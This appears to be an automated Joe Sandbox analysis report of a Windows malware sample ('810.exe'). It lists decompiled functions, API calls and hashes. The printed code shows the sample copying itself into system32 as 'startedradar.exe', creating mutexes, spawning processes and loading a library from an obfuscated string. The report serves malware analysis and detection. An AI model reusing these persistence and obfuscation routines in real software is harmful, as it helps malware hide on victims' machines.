Opcode ID: e4a45e016e8eed5ae3bb71204829eceeae2ff511c9a43c08ecb8195e79df7eb7
Instruction ID: 2f8b3622ee6fa51ee5ff68dff1323ea22ff2763ad36b7acc40deb1ca9fcb3f5c
Opcode Fuzzy Hash: e4a45e016e8eed5ae3bb71204829eceeae2ff511c9a43c08ecb8195e79df7eb7
Instruction Fuzzy Hash: 29E07E7280411DEBDB159BE0DC4DAEEBB79BB04705F000525A206A6560DB3589A6CB61

Uniqueness

Uniqueness Score: 0.08%

Function 00120304, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E00120304() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x14);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x14));
					_t11 = CloseHandle( *(_t13 - 0x10));
				}
				goto 0x312048;
				asm("int3");
				return _t11;
			}

0x00120304
0x0012030d
0x00120331
0x00120339
0x0012033e
0x00120347
0x00120347
0x0012034d
0x00120352
0x00120353

APIs

memset.NTDLL ref: 00120304
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00120331
CloseHandle.KERNEL32(?), ref: 0012033E
CloseHandle.KERNEL32(?), ref: 00120347

Strings

D, xrefs: 0012030D

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: bda520e8e9dcf888e8d553d73ebd1572a4bba7ea1cf2672b7dd1e82bb1d59cec
Instruction ID: 7c988cbae0fdee79560f55181fa3ba6be530771500f6359ac89ab31bc2e627d2
Opcode Fuzzy Hash: bda520e8e9dcf888e8d553d73ebd1572a4bba7ea1cf2672b7dd1e82bb1d59cec
Instruction Fuzzy Hash: 38E0927280411DEFDF159BE0DC4CBEE7B79BB08705F104925E206EA460DB358AA9CF61

Uniqueness

Uniqueness Score: 0.08%

Function 00120500, Relevance: 7.6, APIs: 5, Instructions: 51
memorysynchronizationCOMMON

C-Code - Quality: 79%

			E00120500() {
				void* _t7;
				int _t8;
				void* _t18;
				void* _t19;

				_t19 =  *0x126d5c; // 0x0
				_t18 = 0x126d5c;
				if(_t19 != 0) {
					do {
						_t8 =  *(_t19 + 8);
						if(_t8 == 1 || _t8 == 2) {
						}
						if(_t8 != 3) {
							L8:
							if(0 == 0) {
								_t18 = _t19;
								goto L11;
							}
							goto L9;
						} else {
							_t8 = WaitForSingleObject( *(_t19 + 0x14), 0);
							if(_t8 != 0) {
								goto L8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t19 + 0x10))))( *(_t19 + 0xc), _t8, _t8);
							VirtualFree( *(_t19 + 0xc), 0, 0x8000);
							CloseHandle( *(_t19 + 0x14));
							L9:
							 *_t18 =  *_t19;
							_t8 = HeapFree(GetProcessHeap(), 0, _t19);
						}
						L11:
						_t19 =  *_t18;
					} while (_t19 != 0);
					return _t8;
				}
				return _t7;
			}

0x00120501
0x00120508
0x0012050f
0x00120512
0x00120512
0x0012051a
0x0012051a
0x00120529
0x0012055f
0x00120561
0x00120579
0x00000000
0x00120579
0x00000000
0x0012052b
0x00120530
0x00120538
0x00000000
0x00000000
0x00120542
0x0012054e
0x00120557
0x00120563
0x00120568
0x00120571
0x00120571
0x0012057b
0x0012057b
0x0012057d
0x00000000
0x00120581
0x00120584

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00120530
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0012054E
CloseHandle.KERNEL32(?), ref: 00120557
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0012056A
HeapFree.KERNEL32(00000000), ref: 00120571

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: e463135b5a3baf27d79c44664976a0f850af346861117bc9288d209ea63adcae
Instruction ID: 8f0e649636817515c715b46facf12c19696859719935abb48231ae5e7b458451
Opcode Fuzzy Hash: e463135b5a3baf27d79c44664976a0f850af346861117bc9288d209ea63adcae
Instruction Fuzzy Hash: 8A010031500620EFDB324B94BC84B26BBB9EF18721B254A15F942D7571C7619CB19F50

Uniqueness

Uniqueness Score: 0.02%

Function 00116A24, Relevance: 7.5, APIs: 6, Instructions: 45
memoryCOMMON

C-Code - Quality: 61%

			E00116A24(void* __eax, intOrPtr* __ebx, void* __edi) {
				void _t38;
				intOrPtr _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t60;

				_t54 = __edi;
				_t42 = __ebx;
				if(L00111740(_t60 - 0xb0,  *((intOrPtr*)(__eax + 4))) != 0) {
					_push(_t60 - 0x10);
					if(L00112300(_t54, _t60 - 0x24, _t54) != 0) {
						_t47 =  *(_t60 - 0x10);
						_t51 = _t42 + 4;
						_t38 =  *_t47;
						 *_t51 = _t38;
						if(_t38 < 0x4000000) {
							_push(_t51);
							_t41 = L001167D0(_t47 + 4,  *((intOrPtr*)(_t60 - 0xc)) - 4, _t54);
							_t47 =  *(_t60 - 0x10);
							 *_t42 = _t41;
						}
						HeapFree(GetProcessHeap(), 0, _t47);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				HeapFree(GetProcessHeap(), 0, _t57);
				HeapFree(GetProcessHeap(), 0,  *(_t60 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *_t42 == 0) {
					 *(_t54 + 0x1c) =  *(_t54 + 0x1c) + 1;
					return 0 |  *_t42 != 0x00000000;
				} else {
					 *((intOrPtr*)(_t54 + 0x20)) =  *((intOrPtr*)(_t54 + 0x20)) + 1;
					 *(_t54 + 0x1c) = 0;
					return 0 |  *_t42 != 0x00000000;
				}
			}

0x00116a24
0x00116a24
0x00116a38
0x00116a3f
0x00116a4d
0x00116a4f
0x00116a52
0x00116a55
0x00116a57
0x00116a5e
0x00116a60
0x00116a6a
0x00116a6f
0x00116a75
0x00116a75
0x00116a81
0x00116a81
0x00116a93
0x00116a93
0x00116aa3
0x00116ab5
0x00116ac7
0x00116ad9
0x00116ae2
0x00116afc
0x00116b0c
0x00116ae4
0x00116ae4
0x00116ae9
0x00116afb
0x00116afb

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 00116A7A
HeapFree.KERNEL32(00000000), ref: 00116A81
GetProcessHeap.KERNEL32(00000000), ref: 00116A9C
HeapFree.KERNEL32(00000000), ref: 00116AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 00116AAE
HeapFree.KERNEL32(00000000), ref: 00116AB5

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bc1190c3b43f200166490a81b78d14296faf28e49a65028f6f2cc5339743c480
Instruction ID: 02ce66ce2daab77829fcc9c580eafea0ec7a518b3f8f238eb0d6a09e237be919
Opcode Fuzzy Hash: bc1190c3b43f200166490a81b78d14296faf28e49a65028f6f2cc5339743c480
Instruction Fuzzy Hash: DB01B5B0500605EFDB14EFA0DC89BFEBB7AFF54306F048464E5069B591E772A9A0CB51

Uniqueness

Uniqueness Score: 0.01%

Function 00112597, Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON

APIs

WideCharToMultiByte.KERNEL32 ref: 00112597
GetProcessHeap.KERNEL32 ref: 001125B6
HeapFree.KERNEL32(00000000), ref: 001125BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001125D5
HeapFree.KERNEL32(00000000), ref: 001125DC

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeProcess$ByteCharMultiWide
String ID:
API String ID: 2131386014-0
Opcode ID: e0e8fe536116901ff8d23f316ac12d413885998774321d1014b52481eaaf78b7
Instruction ID: e7c33d8d15f34d412f95d6dad2c0eb5f7c27ae348d06ff9ba35e4c56543d6ab5
Opcode Fuzzy Hash: e0e8fe536116901ff8d23f316ac12d413885998774321d1014b52481eaaf78b7
Instruction Fuzzy Hash: D2F03031605215EFC7684FB498996BD7765AF04312B150465E802DBA50D73188F19B61

Uniqueness

Uniqueness Score: 3.75%

Function 0011119A, Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON

APIs

_snwprintf.NTDLL ref: 001111B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001111BF
HeapFree.KERNEL32(00000000), ref: 001111C6
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 001111D9
CloseHandle.KERNEL32 ref: 00111237

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$CloseCreateEventFreeHandleProcess_snwprintf
String ID:
API String ID: 347592444-0
Opcode ID: 41f6e6483f888dcbd733a08ae833079cf2fd3cccf813e139b9adb0431ee0032c
Instruction ID: ed936a2123e5973e2e5caa50c7acf6ab7e2be38df66d016e2223f828cfdf2f2e
Opcode Fuzzy Hash: 41f6e6483f888dcbd733a08ae833079cf2fd3cccf813e139b9adb0431ee0032c
Instruction Fuzzy Hash: 03F02E72A01114B7DB3017F46C4DBDEBB2CDB04753F0004A2FB0DE6581D67189E58791

Uniqueness

Uniqueness Score: 3.75%

Function 00116A8C, Relevance: 7.5, APIs: 6, Instructions: 14
memoryCOMMON

C-Code - Quality: 50%

			E00116A8C(intOrPtr* __ebx, void* __edi) {
				void* _t31;
				void* _t34;

				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), 0, _t31);
				HeapFree(GetProcessHeap(), 0,  *(_t34 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *__ebx == 0) {
					 *(__edi + 0x1c) =  *(__edi + 0x1c) + 1;
					return 0 |  *__ebx != 0x00000000;
				} else {
					 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + 1;
					 *(__edi + 0x1c) = 0;
					return 0 |  *__ebx != 0x00000000;
				}
			}

0x00116a93
0x00116aa3
0x00116ab5
0x00116ac7
0x00116ad9
0x00116ae2
0x00116afc
0x00116b0c
0x00116ae4
0x00116ae4
0x00116ae9
0x00116afb
0x00116afb

APIs

GetProcessHeap.KERNEL32 ref: 00116A8C
HeapFree.KERNEL32(00000000), ref: 00116A93
GetProcessHeap.KERNEL32(00000000), ref: 00116A9C
HeapFree.KERNEL32(00000000), ref: 00116AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 00116AAE
HeapFree.KERNEL32(00000000), ref: 00116AB5

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a67dc700d335b49751fa27c3cdf75e12d3b22e40d1e6442f8519d74ed4ba289c
Instruction ID: cf03bd0967d39cf328ac7901010b7ed6454ddbde0907b532fb3174a3ee9d307f
Opcode Fuzzy Hash: a67dc700d335b49751fa27c3cdf75e12d3b22e40d1e6442f8519d74ed4ba289c
Instruction Fuzzy Hash: 85D0B772548B00FBD7651BE0AD8DB6D3E2ABB09703F450444F206858E1CA7645B29B22

Uniqueness

Uniqueness Score: 0.01%

Function 00118311, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
memorylibraryUNIQUE

C-Code - Quality: 70%

			E00118311(void* __esi, void* __eflags) {
				int _t31;
				void* _t33;
				intOrPtr _t35;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t41;

				 *((intOrPtr*)(_t41 - 0x6c)) = 0x57762683;
				 *((intOrPtr*)(_t41 - 0x68)) = 0x592baf94;
				 *((intOrPtr*)(_t41 - 0x64)) = 0xad8fd844;
				 *((intOrPtr*)(_t41 - 0x60)) = 0xba8e947f;
				 *((intOrPtr*)(_t41 - 0x5c)) = 0x75eb77e0;
				 *((intOrPtr*)(_t41 - 0x58)) = 0x6b9a4e89;
				 *((intOrPtr*)(_t41 - 0x54)) = 0x8f463d09;
				 *((intOrPtr*)(_t41 - 0x50)) = 0x445c08e3;
				 *((intOrPtr*)(_t41 - 0x4c)) = 0x9644cebc;
				 *((intOrPtr*)(_t41 - 0x48)) = 0x500c095b;
				 *((intOrPtr*)(_t41 - 0x44)) = 0x1dbceffb;
				 *((intOrPtr*)(_t41 - 0x40)) = 0x10966022;
				 *((intOrPtr*)(_t41 - 0x3c)) = 0xced97c24;
				 *((intOrPtr*)(_t41 - 0x38)) = 0xd2b6aaa3;
				 *((intOrPtr*)(_t41 - 0x34)) = 0xa7ede2e6;
				 *((intOrPtr*)(_t41 - 0x30)) = 0xbfd00c40;
				 *((intOrPtr*)(_t41 - 0x2c)) = 0x506bf409;
				 *((intOrPtr*)(_t41 - 0x28)) = 0x51769f7e;
				 *((intOrPtr*)(_t41 - 0x24)) = 0x4a3b59bb;
				 *((intOrPtr*)(_t41 - 0x20)) = 0x7e8ef40c;
				 *((intOrPtr*)(_t41 - 0x1c)) = 0xc05c293d;
				 *((intOrPtr*)(_t41 - 0x18)) = 0xfd52ddd5;
				 *((intOrPtr*)(_t41 - 0x14)) = 0xca5a685e;
				 *((intOrPtr*)(_t41 - 0x10)) = 0x490ba5f1;
				 *((intOrPtr*)(_t41 - 0xc)) = 0xc8f2a124;
				 *((intOrPtr*)(_t41 - 8)) = 0xf2d76c27;
				 *((intOrPtr*)(_t41 - 4)) = 0x12571069;
				_t39 = L00111D00(0x122cf0, _t36, _t37);
				 *0x127c7c = LoadLibraryW(_t39);
				_t31 = HeapFree(GetProcessHeap(), 0, _t39);
				_t35 =  *0x127c7c; // 0x0
				_pop(_t40);
				if(_t35 != 0) {
					goto 0x311714;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00111480(_t33, _t35, _t36, _t37, _t40);
				} else {
					goto 0x311701;
					return _t31;
				}
			}

0x00118311
0x0011831d
0x00118324
0x0011832b
0x00118332
0x00118339
0x00118340
0x00118347
0x0011834e
0x00118355
0x0011835c
0x00118363
0x0011836a
0x00118371
0x00118378
0x0011837f
0x00118386
0x0011838d
0x00118394
0x0011839b
0x001183a2
0x001183a9
0x001183b0
0x001183b7
0x001183be
0x001183c5
0x001183cc
0x001183db
0x001183e7
0x001183f3
0x001183f9
0x001183ff
0x00118402
0x0011840a
0x0011840f
0x00118410
0x00118411
0x00118412
0x00118413
0x00118414
0x00118415
0x00118416
0x00118417
0x00118418
0x00118424
0x00118404
0x00118404
0x00118409
0x00118409

APIs

LoadLibraryW.KERNEL32(00000000), ref: 001183DE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001183EC
HeapFree.KERNEL32(00000000), ref: 001183F3

Strings

wu, xrefs: 00118332

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: wu
API String ID: 872250060-894654108
Opcode ID: 116d818fce4213cdaedd250b4e38835e773394e0d126d525967b52270d655d42
Instruction ID: 4d9c5b7d5d6a81b00288c88aec4f6d6342ec9f2e087a17aed37424a89b74c71f
Opcode Fuzzy Hash: 116d818fce4213cdaedd250b4e38835e773394e0d126d525967b52270d655d42
Instruction Fuzzy Hash: F421CAB0C05399EBDF24DFD2A9841EEBEB5BB05701F204009E6122EA54D7B94A92CF95

Uniqueness

Uniqueness Score: 100.00%

Function 0012012A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
memoryUNIQUE

C-Code - Quality: 100%

			E0012012A(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}

0x0012012f

APIs

_snwprintf.NTDLL ref: 00120160
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0012016E
HeapFree.KERNEL32(00000000), ref: 00120175

Strings

C:\Windows\system32\startedradar.exe, xrefs: 00120154

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintf
String ID: C:\Windows\system32\startedradar.exe
API String ID: 1826127215-941650888
Opcode ID: 7f8dc550ba526524ea21902ac5219984bd30b66aaa2e209d1e26130714ae65b6
Instruction ID: 86600b6080764c43d1a667d58c528dbb0de87bb01d9a2e489e712b74c3ae8243
Opcode Fuzzy Hash: 7f8dc550ba526524ea21902ac5219984bd30b66aaa2e209d1e26130714ae65b6
Instruction Fuzzy Hash: 14E0E572505314BBC72157957C0EBEB7B59EF403A2F100A9AFA09D6881D77184B587A1

Uniqueness

Uniqueness Score: 100.00%

Function 0011FC54, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17UNIQUE

APIs

memset.NTDLL ref: 0011FC54
SHFileOperationW.SHELL32(?), ref: 0011FC7A

Strings

C:\Users\user\810.exe, xrefs: 0011FC67
C:\Windows\system32\startedradar.exe, xrefs: 0011FC6E

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: FileOperationmemset
String ID: C:\Users\user\810.exe$C:\Windows\system32\startedradar.exe
API String ID: 1721435463-2843632137
Opcode ID: 53b38252f93eada902d00ddc33f9754ace44317e4b7696ace87d688cfb4d4ebc
Instruction ID: 604d5a639630ce000c1b4d797c92f445b50050603b3ca2a548706d252847ef9c
Opcode Fuzzy Hash: 53b38252f93eada902d00ddc33f9754ace44317e4b7696ace87d688cfb4d4ebc
Instruction Fuzzy Hash: B9E01A30805209DBCF28CF80A5086EE7BB5FF04394F600469C90176510D7715699DFD2

Uniqueness

Uniqueness Score: 100.00%

Function 00111679, Relevance: 6.1, APIs: 4, Instructions: 77
memoryCOMMON

C-Code - Quality: 53%

			E00111679(intOrPtr __ecx, void** __edx) {
				signed int _t19;
				void _t24;
				long _t33;
				void* _t39;
				void** _t40;
				void _t42;
				long _t45;
				void* _t48;

				 *(_t48 - 0x10) = __edx;
				 *((intOrPtr*)(_t48 - 0xc)) = __ecx;
				 *(_t48 - 8) = 4;
				_t19 =  *0x12737c(__ecx, 0x20000005, _t48 - 4, _t48 - 8, 0);
				_t45 = 0;
				_t42 = 0;
				asm("sbb ebx, ebx");
				_t33 =  ~_t19 &  *(_t48 - 4);
				if(_t33 <= 0) {
					L10:
					return _t42;
				} else {
					_t39 = RtlAllocateHeap(GetProcessHeap(), 8, _t33);
					 *(_t48 - 4) = _t39;
					if(_t39 == 0) {
						goto L10;
					} else {
						 *(_t48 - 8) = 0;
						if(_t33 == 0) {
							L8:
							_t24 = HeapFree(GetProcessHeap(), 0, _t39);
							if(_t42 != 0) {
								goto L9;
							}
							goto L10;
						} else {
							while(1) {
								_t24 =  *0x1271a4( *((intOrPtr*)(_t48 - 0xc)), _t39 + _t45, _t33 - _t45, _t48 - 8);
								_t42 = _t24;
								if(_t42 == 0) {
									break;
								}
								_t39 =  *(_t48 - 8);
								if(_t39 == 0) {
									L9:
									goto 0x3102e4;
									asm("int3");
									 *_t39 = _t24;
									 *(_t39 + 4) = _t45;
									goto L10;
								} else {
									_t45 = _t39 + _t45;
									_t39 =  *(_t48 - 4);
									if(_t45 < _t33) {
										continue;
									} else {
										_t40 =  *(_t48 - 0x10);
										 *_t40 = _t39;
										_t40[1] = _t45;
										return _t42;
									}
								}
								goto L11;
							}
							_t39 =  *(_t48 - 4);
							goto L8;
						}
					}
				}
				L11:
			}

0x0011167b
0x00111683
0x0011168a
0x00111698
0x001116a0
0x001116a7
0x001116a9
0x001116ab
0x001116ae
0x00111735
0x0011173d
0x001116b4
0x001116c4
0x001116c6
0x001116cb
0x00000000
0x001116cd
0x001116cd
0x001116d2
0x00111716
0x00111720
0x00111728
0x00000000
0x00000000
0x00000000
0x001116d4
0x001116d4
0x001116e4
0x001116ea
0x001116ee
0x00000000
0x00000000
0x001116f0
0x001116f5
0x0011172a
0x0011172a
0x0011172f
0x00111730
0x00111732
0x00000000
0x001116f7
0x001116f7
0x001116f9
0x001116fe
0x00000000
0x00111700
0x00111702
0x00111705
0x0011170a
0x00111712
0x00111712
0x001116fe
0x00000000
0x001116f5
0x00111713
0x00000000
0x00111713
0x001116d2
0x001116cb
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,?,?,20000005,?,?,00000000), ref: 001116B7
RtlAllocateHeap.NTDLL(00000000,?,20000005), ref: 001116BE
GetProcessHeap.KERNEL32(00000000,00000000,?,20000005,?,?,00000000), ref: 00111719
HeapFree.KERNEL32(00000000,?,20000005), ref: 00111720

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: bb7fba0be44343f9ef2ffd9bbc678fbf7865ec3f056365579db6666c1bac78b5
Instruction ID: b74fb542891f5f4dffe76e88df4f130eedad4b6e4b715d230c41c479de9d7d0a
Opcode Fuzzy Hash: bb7fba0be44343f9ef2ffd9bbc678fbf7865ec3f056365579db6666c1bac78b5
Instruction Fuzzy Hash: 11214C76B04208BBDB18CF98DC88BEDBBBAEB48311F1401BDEA09D7680DB714D418B50

Uniqueness

Uniqueness Score: 0.01%

Function 00111140, Relevance: 6.0, APIs: 4, Instructions: 33memorysynchronizationCOMMON

APIs

_snwprintf.NTDLL ref: 00111159
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00111165
HeapFree.KERNEL32(00000000), ref: 0011116C
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 0011117D

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$CreateFreeMutexProcess_snwprintf
String ID:
API String ID: 3932063178-0
Opcode ID: 8b2c2dbb9d0cb44b33aac96039f8f524aa55351cc1b242d5fcbd5277134dec4c
Instruction ID: 1ae5566b614d5aa7babadca89ce2d1a1bbe603e73f9469165ba814f2e64b2793
Opcode Fuzzy Hash: 8b2c2dbb9d0cb44b33aac96039f8f524aa55351cc1b242d5fcbd5277134dec4c
Instruction Fuzzy Hash: 0FF0EC72700209BBDB2417D56C4EBDE7719EB44353F0000B1F70DD5581D97285E58B91

Uniqueness

Uniqueness Score: 3.75%

Function 001167DC, Relevance: 6.0, APIs: 4, Instructions: 32
memoryCOMMON

C-Code - Quality: 76%

			E001167DC(intOrPtr __ecx, void* __edx, long* __edi) {
				void* _t4;
				void* _t9;
				void* _t17;
				void* _t19;

				_t9 = __edx;
				 *((intOrPtr*)(_t19 - 4)) = __ecx;
				_t4 = RtlAllocateHeap(GetProcessHeap(), 8,  *__edi);
				_t17 = _t4;
				if(_t17 == 0) {
					L4:
					goto 0x311546;
					asm("int3");
					return _t4;
				} else {
					_push(_t9);
					_push( *((intOrPtr*)(_t19 - 4)));
					if(L00112D50(_t17, __edi) == 0) {
						_t4 = _t17;
						goto L4;
					} else {
						HeapFree(GetProcessHeap(), 0, _t17);
						return 0;
					}
				}
			}

0x001167dc
0x001167de
0x001167ec
0x001167f2
0x001167f6
0x00116827
0x00116827
0x0011682c
0x0011682d
0x001167f8
0x001167f8
0x001167f9
0x0011680a
0x00116825
0x00000000
0x0011680c
0x00116816
0x00116824
0x00116824
0x0011680a

APIs

GetProcessHeap.KERNEL32(00000008), ref: 001167E5
RtlAllocateHeap.NTDLL(00000000), ref: 001167EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0011680F
HeapFree.KERNEL32(00000000), ref: 00116816

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 737a9cba185a877895f17e66cf0fcdd71d1b670f8a8aec1775592ba9621b2bc1
Instruction ID: bc52fe5b1fff02c16ab873499bbfbd02f51b0fc4b4bbbfdcefc87fd111350f87
Opcode Fuzzy Hash: 737a9cba185a877895f17e66cf0fcdd71d1b670f8a8aec1775592ba9621b2bc1
Instruction Fuzzy Hash: DBF0E531B00710FBCB2557E5AC497BDBA6AEF4C713F040079F909C2650EB728C6197A1

Uniqueness

Uniqueness Score: 0.01%

Function 00116878, Relevance: 6.0, APIs: 4, Instructions: 31
memoryCOMMON

C-Code - Quality: 47%

			E00116878(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t17;
				void* _t18;
				void* _t28;
				void* _t30;
				void* _t32;

				_t30 = __esi;
				_t18 = __ebx;
				asm("popfd");
				asm("int3");
				_t28 = L00111D00(__ecx, __edx, __edi);
				_t12 =  *0x1259dc(_t18, _t30, _t28, GetTickCount() % 0xffff);
				HeapFree(GetProcessHeap(), 0, _t28);
				_push(_t18 + _t12 * 2);
				L00111850( *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)))),  *((intOrPtr*)( *((intOrPtr*)(_t32 - 4)) + 4)));
				_t17 = _t18;
				goto 0x311578;
				return _t17;
			}

0x00116878
0x00116878
0x00116878
0x00116879
0x00116882
0x00116897
0x001168ac
0x001168b8
0x001168be
0x001168c6
0x001168c9
0x001168ce

APIs

GetTickCount.KERNEL32 ref: 00116884
_snwprintf.NTDLL ref: 00116897
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001168A5
HeapFree.KERNEL32(00000000), ref: 001168AC

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

